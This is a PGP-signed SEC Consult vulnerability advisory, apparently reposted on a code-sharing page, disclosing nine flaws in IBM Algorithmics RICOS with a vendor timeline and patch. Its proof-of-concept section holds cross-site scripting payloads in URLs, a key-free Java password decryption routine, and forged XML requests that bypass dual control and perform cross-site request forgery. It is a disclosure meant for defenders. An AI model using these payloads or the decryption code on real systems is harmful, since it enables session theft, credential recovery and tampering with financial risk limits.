扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355 356 357 358 359 360 361 362 |
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 SEC Consult Vulnerability Lab Security Advisory < 20140630-0 > ======================================================================= title: Multiple severe vulnerabilities product: IBM Algorithmics RICOS vulnerable version: 4.5.0 - 4.7.0 fixed version: 4.7.0.03 CVE number: CVE-2014-0894 CVE-2014-0871 CVE-2014-0870 CVE-2014-0869 CVE-2014-0868 CVE-2014-0867 CVE-2014-0866 CVE-2014-0865 CVE-2014-0864 impact: critical homepage: http://www-01.ibm.com/software/analytics/algorithmics/ found: 2013-12-19 by: A. Kolmann, V. Habsburg-Lothringen, F. Lukavsky SEC Consult Vulnerability Lab https://www.sec-consult.com ======================================================================= Vendor description: - ------------------- IBM Algorithmics software enables financial institutions and corporate treasuries to make risk-aware business decisions. Supported by a global team of risk experts based in all major financial centers, IBM Algorithmics solution offerings include market, credit and liquidity risk, as well as collateral and capital management. Source: http://www-01.ibm.com/software/analytics/algorithmics/ RICOS is a pre-deal limit management solution part of the Algo Suite. Business recommendation: - ------------------------ The identified vulnerabilities affect integrity and confidentiality of the risk management system. SEC Consult does not recommend to rely on RICOS as part of risk management until a thorough security review has been performed by security professionals. As a workaround, access should be limited only to trusted users internally and sample checks regarding the plausibility of limits should be performed manually. Vulnerability overview/description: - ----------------------------------- 1) Information Disclosure (PSIRT#1440 / CVE-2014-0871 / CVSS 4.3) The Tomcat configuration discloses technical details within error messages to the user, which allows an attacker to collect valuable data about the environment of the solution. 2) Password Disclosure (PSIRT#1441 / CVE-2014-0894 / CVSS 3.5) The password and the username of the backend database are disclosed in clear-text to the user of the web application. This allows attackers to directly connect to the backend database and manipulate arbitrary data stored in the database (e.g. limits). 3) Non-permanent Cross-Site Scripting (PSIRT#1442 / CVE-2014-0870 / CVSS 4.3) Several parameters in the RICOS web front end and the Blotter are not properly sanitized and cause Cross-Site Scripting vulnerabilities. Attackers can steal user sessions and impersonate other users while performing arbitrary actions on behalf of the victim user. 4) Broken Encryption (PSIRT#1443 / CVE-2014-0869 / CVSS 4.3) Weak cryptographic algorithms, being used to store and transfer user's passwords, allow an attacker to retrieve the plain-text passwords without further knowledge of cryptographic keys. 5) Manipulation of read-only data / dual control mechanism bypass (PSIRT#1444 / CVE-2014-0868 / CVSS 3.5) Several fields of stored data within RICOS are marked as read-only in the web application, disallowing modification of certain fields. These checks are only performed client-side, allowing an attacker to alter arbitrary data. An attacker can create a limit, alter the username of the created limit and confirm the limit himself, circumventing dual control mechanisms advertised by RICOS. 6) Cross-Site Cookie Setting (PSIRT#1445 / CVE-2014-0867 / CVSS 4.3) A vulnerable page in RICOS allows an attacker to set and overwrite arbitrary cookies for a user that clicks on a manipulated link. 7) Plain-text submission of passwords (PSIRT#1446 / CVE-2014-0866 / CVSS 4.3) The RICOS fat client submits user credentials in plain-text. An attacker with access to the network communication can perform man-in-the-middle attacks and steal user credentials. This vulnerability also applies to the Blotter, where authentication is performed unencrypted. 8) Client-side Input Validation (PSIRT#1447 / CVE-2014-0865 / CVSS 3.5) The RICOS fat client performs input validation only client-side. This allows an attacker to alter arbitrary data. An attacker can create a limit, alter the username of the created limit and confirm the limit himself, circumventing dual control mechanisms advertised by RICOS. 9) Cross-Site Request Forgery (PSIRT#1448 / CVE-2014-0864 / CVSS 4.3) The web application does not verify that requests are made only from within the web application, allowing an attacker to trick users into performing requests to the web application. This allows an attacker to perform tasks on behalf of the victim user like modifying limits. Proof of concept: - ----------------- 1) Information Disclosure The following URL causes a status 404, disclosing the Tomcat version: https://ricos/ricos470/classes/ If control characters (i.e. \x00) are sent as part of the cookie, a stack trace is triggered 2) Password Disclosure The following request sent by the client during regular communication shows the database connection settings including the username and the password in clear-text. POST /ricos470/Executer HTTP/1.1 Host: ricos ...SNIP... <i n="URN" v=""/><i n="SecServiceURN" v="obsv2:ricos:20100"/><i n="SecSource" v="LM web"/><i n="SecTimeout" v="7200"/><i n="AcsAutoReconnect" v="Y"/><i n="AcsFunctionLimits" v=""/></t><t n="ObServer"><i n="UserId" v=""/><i n="Password" v=""/><i n="Host" v="ricos"/><i n="Port" v="20100"/><i n="CollectionId" v=""/><i n="DbName" v="RICA"/><i n="Location" v="RICA"/><i n="DbType" v="ORA"/><i n="Application" v="RICOS"/><i n="AppId" v="LM web"/><i n="AppDesc" v=""/><i n="AppVer" v="4.7.0"/><i n="Component" v="RICOS Gui"/><i n="DbUser" v="rica"/><i n="DbPass" v="password"/> ...SNIP... 3) Non-permanent Cross-Site Scripting The following URLs demonstrate Cross-Site Scripting vulnerabilities: POST /ricos470/rcore6/main/showerror.jsp HTTP/1.1 Host: ricos Message=<script>alert(document.cookie)</script>%0D%0A&Stack=java.lang.... https://ricos/ricos470/rcore6/main/buttonset.jsp?ButtonsetClass=x";+alert(document.cookie);//x https://ricos/ricos470/rcore6/frameset.jsp?PROF_NAME=&Caller=login&ChildBrowser=Y&MiniBrowse=Y&OBJECT=profile_login&CAPTION_SELECT=MNU_PROFILE_VIEW&MBName=profile_login')");alert(document.cookie);// http://ricos/algopds/rcore6/main/browse.jsp?Init=N";alert(document.cookie)&Name=trades&StoreName=trades&HandlerFrame=Caption&ShowStatus=N&HasMargin=Y http://ricos/algopds/rcore6/main/ibrowseheader.jsp?Name=trades;alert(document.cookie)&StoreName=trades;alert(document.cookie)&STYLESHEET=browse"/><script>alert(document.cookie)</script> 4) Broken Encryption The user's password is transported frequently in requests within the application. The following function decrypts the password without requiring any cryptographic key: public static void decrypt(String string) { int nRadix = 32; int nR2 = nRadix * nRadix / 2; GregorianCalendar cal = new GregorianCalendar(); String key = string.substring(0, 2); int nKey = Integer.parseInt(key, 32); String encPw = string.substring(2, string.length()); int y = 0; for (int i = 0; i < encPw.length(); i+=2) { String aktuell = encPw.substring(i,i+2); int new_value = Integer.parseInt(aktuell, 32); int character = - nKey * (y + 1) % nR2 + new_value; char decrypt = (char) character; System.out.print(decrypt); y = y + 1; } } 5) Manipulation of read-only data/ dual control mechanism bypass The following example illustrates how to manipulate a request so that the server saves it on behalf of another user (only the relevant parts are shown): <?xml version="1.0" encoding="UTF-8"?> <ds> <t n="Service"> <i n="RequestType" v="#Action"/> <t n="#ActionData"> <i n="#ActionName" v="web.getmeta_udf"/> <i n="#Mode" v="#Sync"/> <i n="#Request" v="#Execute"/> <t n="#OutputData"> <t n="#MapTable"> <i n="#ResultData" v="#ResultData"/> <i n="#ResultTable" v="#ResultTable"/> </t> </t> <t n="#InputData"> <t n="#WorkTable"> <t n="det_limit"> <i n="SCTYGEID" v="A"/> [...] <i n="LMLCURID" v="other_user"/> <i n="LMEQEPSTDA" v=""/> [...] <i n="MFURID" v="other_user"/> <i n="LMEVFL" v="N"/> <i n="SOLMFL" v="N"/> [...] <i n="CRURID" v="other_user"/> <i n="MFTS" v=""/> <i n="MFURID" v="other_user"/> [...] <i n="CRURID" v="other_user"/> <i n="MFTS" v=""/> [...] </t> <t n="Session"> <t n="SessionData"> <i n="LoginUser" v="other_user"/> <i n="LoginPass" v="8HC34BCM5JE84ND95RED"/> [...] <i n="LoginUser v="other_user"/> <i n="LoginPWD" v="326K9DC9FNIT3T70A3D6"/> <i n="URN" v=""/> <i n="SecServiceURN" v="obsv2:ricos:20100"/> [...] </t> <t n="ObServer"> <i n="UserId" v="other_user"/> <i n="Password" v=""/> <i n="Host" v="ricos"/> [...] <i n="Prefix" v="RICA"/> <i n="DbSystem" v="oracle"/> <i n="LoginUserId" v="other_user"/> </t> </t> </t> </ds> 6) Cross-Site Cookie Setting The following URL allows setting of arbitrary cookies: https://ricos/ricos470/rcore6/main/addcookie.jsp?test-cookie=cookie-content 7) Plain-text submission of passwords Neither the fat client nor the Blotter use https to communicate with the backend server. Both send unencrypted credentials via http during authentication. 8) Client-side Input Validation By manipulating serialized objects that are transmitted by the fat client, it is possible to change the user name who created a limit, allowing an attacker to bypass dual control mechanisms. 9) Cross-Site Request Forgery The following request, sent on behalf of an authenticated user will e.g. change the currency of a given deal: POST http://ricos/ricos470/Executer HTTP/1.1 Host: ricos <?xml version="1.0" encoding="UTF-8"?> <ds> <t n="Service"> <i n="RequestType" v="#Action"/> <t n="#ActionData"> <i n="#ActionName" v="web.updrec_msp"/> <i n="#Mode" v="#Sync"/> <i n="#Request" v="#Execute"/> <t n="#InputData"> <t n="#MapTable"> <i n="#InputData" v="det_msp"/> </t> <t n="#WorkTable"> <t n="det_msp"> <i n="SYPMID" v="SYS-PAR-ID"/> <i n="CUCD" v="USD"/> <i n="MIGORILV" v="11"/> <i n="ILPLMVFL" v="Y"/> <i n="ILNEMVFL" v="Y"/> <i n="BSCUONFL" v="N"/> <i n="PBSCUOFL" v="N"/> <i n="LORICUTEFL" v="N"/> <i n="SYSAVAILFL" v="F"/> <i n="CUSTID" v="CUSTOMER"/> <i n="CBNALI" v="IS-LOCATED-IN"/> <i n="CBNAAG" v="AUTOMATIC-GROUP"/> <i n="UDF1" v="Welcome to ricos 4.71"/> </t> ...SNIP... Vulnerable / tested versions: - ----------------------------- IBM Algorithmics RICOS 4.71 Vendor contact timeline: - ------------------------ 2014-01-24: Contacting vendor through psirt@vnet.ibm.com 2014-01-24: Vendor response, will likely require more than 30 days to resolve issues asking for acknowledgements 2014-01-24: Sending acknowledgements 2014-01-29: Vendor assigns PSIRT advisory numbers 1440-1448 to reported issues 2014-02-07: Vendor confirms 8 of 9 vulnerabilities and sends CVE and CVSS 2014-02-10: Providing further information on assumed to be false positive issue 1441 2014-02-14: Telco to clarify vulnerability details and agree on further procedure patches are scheduled for end of June 2014 2014-02-20: Vendor confirms issue 1441 to be a vulnerability 2014-05-27: Vendor announces that patches will be released on 2014-06-30 2014-06-26: Vendor published patches and security bulletin https://www-304.ibm.com/support/entdocview.wss?uid=swg21675881 2014-06-30: SEC Consult publishes the advisory Solution: - --------- Apply patch ACLM 4.7.0.03 FP5. More information: https://www-304.ibm.com/support/entdocview.wss?uid=swg21675881 Workaround: - ----------- Limit access to RICOS and manually perform sample checks regarding the plausibility of limits. Advisory URL: - ------------- https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius Headquarter: Mooslackengasse 17, 1190 Vienna, Austria Phone: +43 1 8903043 0 Fax: +43 1 8903043 15 Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult Interested to work with the experts of SEC Consult? Write to career@sec-consult.com EOF F. Lukavsky / @2014 -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (MingW32) Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/ iQEcBAEBAgAGBQJTsZDnAAoJECyFJyAEdlkKDUIH/3d/PLRdTNA9EludLlr7M+K+ uaBxgyajy8sT7dYMedR3EcxKxZSUGExnv+2X4GZN0Px8a9NvEewURIAiM+ZAsdYg uFKPtYcuhO6TyKV/QoPUsixEM3IgzyMpGqcf2qtWqNOb4jVpXvtyO2gLoHQNj04F uQl0v+1it2HNVxd6vEj2zj7neuOLb3WhE6ObDAlVkzcOutvTF84cVyNYpBBuCD6e 0TsopvfkJ3l6iJPSvgXpl1gTmSoR0PfEC14JYVKCK0pTbhXc81J8YYGQnEklWazl EEUoMVM0I6Yzg9oXGpHf5cBX49pbzAYm5lhJkCDiSQ+2ueSYN0BEz3e2JMtDEZ8= =OFL7 -----END PGP SIGNATURE----- |
体验盒子
